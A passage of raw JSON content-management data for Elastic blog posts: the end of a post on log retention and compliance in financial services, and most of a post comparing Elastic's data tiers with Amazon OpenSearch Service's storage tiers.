href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/snapshots-register-repository.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLearn more about snapshot repositories\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"A scalable solution for data growth","_metadata":{"uid":"cs76abb06f21c7dae0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic’s data tiering strategy — from hot to frozen — provides financial services companies with a powerful, cost-effective solution for managing long-term data retention and compliance. By using advanced features, such as searchable snapshots and tiered storage, financial organizations can ensure regulatory compliance, optimize operational efficiency, and maintain customer trust — all while controlling costs.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAs financial services continue to navigate the explosion of data (often in a legacy systems environment), tools like Elastic Cloud will be indispensable in enabling smarter, more agile data management.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFor more detailed guidance on setting up searchable snapshots and integrating with cloud storage, see Elastic’s documentation guides or \u003c/span\u003e\u003ca href=\"https://www.elastic.co/industries/financial-services/contact\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ereach out to us directly\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9fdd7618ba19e9b2"}}},{"callout":{"title_l10n":"","_metadata":{"uid":"csbfb48effbd38600c"},"paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eRelated resources\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eBlog:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elasticsearch-logsdb-index-mode\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLive log and prosper: Elasticsearch newly specialized logsdb index mode\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eBlog: \u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/how-do-incremental-snapshots-work\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHow do Elasticsearch snapshots work?\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eBlog: \u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-splunk-data-tiers-differences\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWhat’s the difference? Elastic and Splunk data tiers\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eBlog:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/searchable-snapshots-benchmark\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIce, Ice, Maybe: Measuring Searchable Snapshots Performance\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd2b0fcc54aca7acf"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs766517b7ded98c1c"}}}],"publish_date":"2025-02-14","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Optimize financial data retention and compliance with Elastic Cloud solutions","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Elastic Cloud empowers financial institutions to optimize data retention, ensure compliance with regulations like GDPR and PCI DSS, and contain costs with advanced tiering and searchable snapshots.","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt4ce45bbfeeff0638","ACL":{},"created_at":"2021-07-12T21:53:30.326Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"logs","label_l10n":"Logs","tags":[],"title":"Logs","updated_at":"2021-07-12T21:53:30.326Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.411Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltefbcf6957c5e689a","ACL":{},"created_at":"2023-11-06T20:35:45.445Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-search","label_l10n":"Cloud search","tags":[],"title":"Cloud search","updated_at":"2023-11-06T20:35:45.445Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:40:50.742Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt2d51fc8cada40465","ACL":{},"created_at":"2023-11-06T20:35:57.040Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-security","label_l10n":"Cloud security","tags":[],"title":"Cloud security","updated_at":"2023-11-06T20:35:57.040Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.295Z","user":"blt4b2e1169881270a8"}},{"title":"Customer experience","label_l10n":"Customer experience","keyword":"customer-experience","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt25722919b3bca233","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T22:34:27.803Z","updated_at":"2021-12-16T22:34:27.803Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:15:55.021Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt0e7c39f65cbd3755","ACL":{},"created_at":"2023-11-06T20:37:20.943Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"data-ingestion","label_l10n":"Data ingestion","tags":[],"title":"Data ingestion","updated_at":"2023-11-06T20:37:20.943Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.173Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Google Cloud","label_l10n":"Google Cloud","keyword":"google-cloud","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltbf617849beaf10fe","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:39:59.168Z","updated_at":"2023-11-06T20:40:14.658Z","ACL":{},"_version":2,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:39.796Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","uid":"blt4a47bf681100e8ca","title":"Log management","label_l10n":"Log management","keyword":"log-management","hidden_value":false,"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:42:23.694Z","updated_at":"2023-11-06T20:42:23.694Z","ACL":{},"_version":1,"publish_details":{"time":"2023-11-09T17:49:08.358Z","user":"bltd2a3eb4e4d2bc159","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_content_type_uid":"tags_topic","uid":"bltf38f037a2b6ecb4e","title":"Log monitoring","label_l10n":"Log monitoring","keyword":"log-monitoring","hidden_value":false,"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:29:28.882Z","updated_at":"2023-11-06T21:29:28.882Z","ACL":{},"_version":1,"publish_details":{"time":"2023-11-09T17:49:08.371Z","user":"bltd2a3eb4e4d2bc159","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt2e5ece40473e6b0a","ACL":{},"created_at":"2020-06-17T03:32:06.756Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"log-analytics","label_l10n":"Log analytics","tags":[],"title":"Log analytics","updated_at":"2020-07-06T22:20:10.220Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.397Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blta7d499adb075787c","_version":1,"title":"Clouds over the city.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-02-14T17:21:38.910Z","updated_at":"2025-02-14T17:21:38.910Z","content_type":"image/jpeg","file_size":"164789","filename":"Clouds_over_the_city.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-14T17:24:16.404Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta7d499adb075787c/67af7ba2cb5ff171cc0624ea/Clouds_over_the_city.jpg"},"title":"Logging compliance and cost containment in financial services","title_l10n":"Logging compliance and cost containment in financial services ","updated_at":"2025-02-14T17:47:19.870Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/logging-compliance-and-cost-containment-in-financial-services","publish_details":{"time":"2025-02-14T17:47:25.537Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt59a8d562bb2359bd","_version":10,"locale":"en-us","ACL":{},"abstract_l10n":"This article deciphers the data storage tiers of Elastic and Amazon OpenSearch Service, explaining their distinctions and functionalities to ensure effective and cost-efficient data management. ","author":["blta7f0603fbcf41094"],"category":["bltb79594af7c5b4199"],"created_at":"2024-01-17T18:33:58.136Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse3e7b6d350920a0d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn the realm of data management, terms like \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eHot\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eWarm\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, and \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCold\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e get tossed around frequently when discussing how data should be made available and/or retained given different performance requirements.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen comparing Elastic®’s data tiers to Amazon OpenSearch Service tiers, there’s yet another challenge — the same terms don't mean the same thing. Through this explanation, we seek to clear up any misconceptions around similar data tier terminology between Elastic and Amazon OpenSearch Service. With the insights provided here, you'll be in a prime position to strategically manage your data, maximizing performance while minimizing costs. This chart is a handy summary:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs33abd3673656e3a4"}}},{"image":{"image":{"uid":"blt78ace15a436b98a3","_version":1,"created_by":"bltd9765be97bbed20c","updated_by":"bltd9765be97bbed20c","created_at":"2024-02-27T16:27:15.564Z","updated_at":"2024-02-27T16:27:15.564Z","content_type":"image/png","file_size":"1004948","filename":"imagen.png","title":"imagen.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-02-27T16:28:35.937Z","user":"bltd9765be97bbed20c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt78ace15a436b98a3/65de0d63c7f05b89a38674f7/imagen.png"},"_metadata":{"uid":"cs1f810bcfc0470222"},"caption_l10n":"","alt_text_l10n":"hot cold","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs9e7d0becdc314412"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eWhat are data tiers?\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e At a fundamental level, data tiers are distinct storage levels that classify data based on criteria like access frequency, cost efficiency, and performance needs. They allow for optimized data organization and can help reduce costs by aligning storage expenses with the value of the information over time.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What a difference a tier makes","_metadata":{"uid":"cs03032a6e06f29c9c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe concept of data tiers is present in most data platforms, especially in those that deal with observability and/or security tools. The volume of data collected by these tools is usually very high, with thousands/millions of events per second being processed and made available for searching, dashboarding, and alerting. Observability and security also have a shared characteristic: \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003ethe most recent data is also the most valuable\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, as teams administering these tools rely on the signals being collected to take immediate action in case of problems.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSo it makes sense for data to be ingested and stored with the fastest possible hardware and moved “down” to cheaper, less powerful hardware as time passes.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Data journey in Elastic","_metadata":{"uid":"cs23ddf8a9db9b4f1a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic has five tiers, which can be independently or collectively utilized depending on your specific use case:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eHot:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Your data always arrives here first, and it’s highly-available in real time, scalable, and offers the best possible performance (assuming best practices are adhered to). This is where you keep data that you need to access and manipulate frequently.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eWarm:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e This tier allows for more cost-effective hardware utilization, where data that isn’t in immediate demand (but still relatively important) can reside. You can move data to this tier and optimize it (by\u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-forcemerge.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e force-merging the segments\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e for instance), so searches are as fast as possible. Data in this tier is still scalable with replicas, just like in the Hot tier so as to meet search demands if needed.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eCold:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Here it ensures at least one copy of the data will always be allocated to the node and searchable at any given moment. The Cold tier uses object storage to aid in data restoration should there be a failure or a need to alter the topology of the cluster.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eFrozen:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e In this tier, data is less frequently accessed and allows for cost savings as it leverages the lowest cost storage and reduces compute resources. Data is searchable, but it must be restored back into a searchable state, which is done automatically and transparently with Elasticsearch®’s \u003c/span\u003e\u003ca href=\"https://www.elastic.co/elasticsearch/elasticsearch-searchable-snapshots\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003esearchable snapshots\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSnapshots:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Snapshots are essentially data backups — point-in-time copies of your indices. These can be used for various purposes, such as data recovery in case of a loss, creating clones of indices for testing or staging environments, or for migrating data between clusters. Snapshots are stored in a repository, which could be on different storage systems like a local filesystem or object storage (e.g., GCS, S3) and must be manually restored for data to be searchable.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs47dff46a7437679b"}}},{"callout":{"title_l10n":"Wait, what is a “shard”?","_metadata":{"uid":"cs5763fa8e53550292"},"paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn Elasticsearch (and therefore also OpenSearch), a “shard” is essentially a self-contained index that holds a portion of your data, enabling the distribution of large data sets across multiple nodes (servers) for improved performance and scalability.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThere are two types of shards: primary shards and replica shards. \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePrimary shards\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e are the main containers where data is first stored; each record is stored in only one primary shard. \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eReplica shards\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e are copies of the primary shards that provide redundancy in case of a failure and also allows the system to handle more read requests by load balancing search queries across the replicas. To a newcomer, you can think of shards as individual chapters of a book; while each chapter (shard) contains a different section of the story (data), multiple printed copies (replicas) ensure that even if one gets lost, the story can still be fully read.\u003c/span\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"Data journey in Amazon OpenSearch Service","_metadata":{"uid":"cs6848e1af963b8c49"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAmazon OpenSearch Service has four tiers:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eHot:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Your data always arrives here first, and it’s highly-available in real time, scalable, and offers the best possible performance, assuming best practices are adhered to.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eOR1:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Data is both readable and writable,\u003c/span\u003e\u003ca href=\"https://docs.aws.amazon.com/opensearch-service/latest/developerguide/or1.html\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e as OR1\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e has compute power permanently attached to it, but there are no replicas. Data is restored from object storage in case of failure.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eUltraWarm:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e This tier is designed for cost-effective storage and querying large data volumes that are accessed less frequently. UltraWarm nodes in Amazon OpenSearch Service provide a secondary storage tier that keeps data queryable.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eCold:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Data in OpenSearch’s Cold tier typically incurs lower storage costs, but it’s not directly searchable. Accessing Cold data generally involves manually restoring the data to a warmer tier, which is then made searchable.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Side-by-side comparison","_metadata":{"uid":"csdb53928da220e13a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow we can compare the tiers in terms of \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003edata access\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e capabilities: can data be read and written or is it read-only? Does it need to be manually restored or is the “thawing” process automatic? Here’s what each “band” represents:\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Read + Write","_metadata":{"uid":"csd11fb6012e099a0a"},"header_style":"H3","paragraph_l10n":""}],"_metadata":{"uid":"cs4eddcd9177338b94"}}},{"image":{"image":{"uid":"blt67de1fb5c56e10c8","_version":1,"created_by":"bltd9765be97bbed20c","updated_by":"bltd9765be97bbed20c","created_at":"2024-02-27T16:27:40.120Z","updated_at":"2024-02-27T16:27:40.120Z","content_type":"image/png","file_size":"411158","filename":"imagen_(1).png","title":"imagen_(1).png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-02-27T16:28:35.915Z","user":"bltd9765be97bbed20c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt67de1fb5c56e10c8/65de0d7cd781fe36a9e73690/imagen_(1).png"},"_metadata":{"uid":"cs1aa00b0869931add"},"caption_l10n":"","alt_text_l10n":"Read + Write","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5a35e385038d0c04"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis band considers \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eHot\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e in both Elastic and OpenSearch as their fastest tier. Since they are supposed to be equivalent, we compared their performance \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elasticsearch-opensearch-performance-gap\"\u003e\u003cspan style='font-size: 12pt;'\u003ein this blog\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe next tier, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eWarm\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e in Elastic and \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eOR1\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e in Amazon OpenSearch Service both allow data to be updated but have differences in terms of scalability — while Elastic's \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eWarm\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e allows for replicas and lets you scale to meet search demands, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eOR1\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e does not, since only the primary shards are allowed to be used.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Read-Only","_metadata":{"uid":"csd71e7b3a05979a18"},"header_style":"H3","paragraph_l10n":""}],"_metadata":{"uid":"cse8d14754f3f4b41b"}}},{"image":{"image":{"uid":"blt8225c4329e53a027","_version":1,"created_by":"bltd9765be97bbed20c","updated_by":"bltd9765be97bbed20c","created_at":"2024-02-27T16:27:53.082Z","updated_at":"2024-02-27T16:27:53.082Z","content_type":"image/png","file_size":"535430","filename":"imagen_(2).png","title":"imagen_(2).png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-02-27T16:28:35.896Z","user":"bltd9765be97bbed20c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8225c4329e53a027/65de0d89d85aff56b647bd11/imagen_(2).png"},"_metadata":{"uid":"cs7dc9fe8f78b6cc35"},"caption_l10n":"","alt_text_l10n":"Read-Only","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs2835f6e9b4906345"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThis band does not allow for data to be updated (written); it only allows for data to be migrated from other tiers. All tiers in this group have object storage backup and no replicas.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBoth \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eFrozen\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e tier in Elastic and \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eUltraWarm\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e in Amazon OpenSearch Service store the data in object storage as snapshots and retrieve this data if a search is issued in any of the involved indices. Only then the data is made available and then cached for subsequent searches. However \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eUltraWarm \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003enodes come in only \u003c/span\u003e\u003ca href=\"https://aws.amazon.com/opensearch-service/pricing/#UltraWarm_and_cold_storage_pricing\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003etwo configurations currently\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: either one that can address 1.5TB of snapshot data or another that can address 20TB of snapshot data. This means that if we wanted to store 100TB worth of data, we would need 5 UltraWarm nodes in Amazon OpenSearch Service but only 2 Frozen nodes in Elastic, which has different \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-default-aws-configurations.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ehardware profiles\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e with different combinations of vCPU, RAM, and NVMe storage.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFurthermore in Elastic, both \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eCold\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eFrozen\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e rely on the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/searchable-snapshots.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003esearchable snapshots\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e feature, which allows snapshots as old as 5.0 (released way back in 2016!) to be searched \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.11/archive-indices.html#archive-indices-supported-field-types\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ewithout the need to be restored to an active cluster\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e — this is very useful for governance and compliance, security investigations, and historical lookbacks regardless of what Elasticsearch version you are 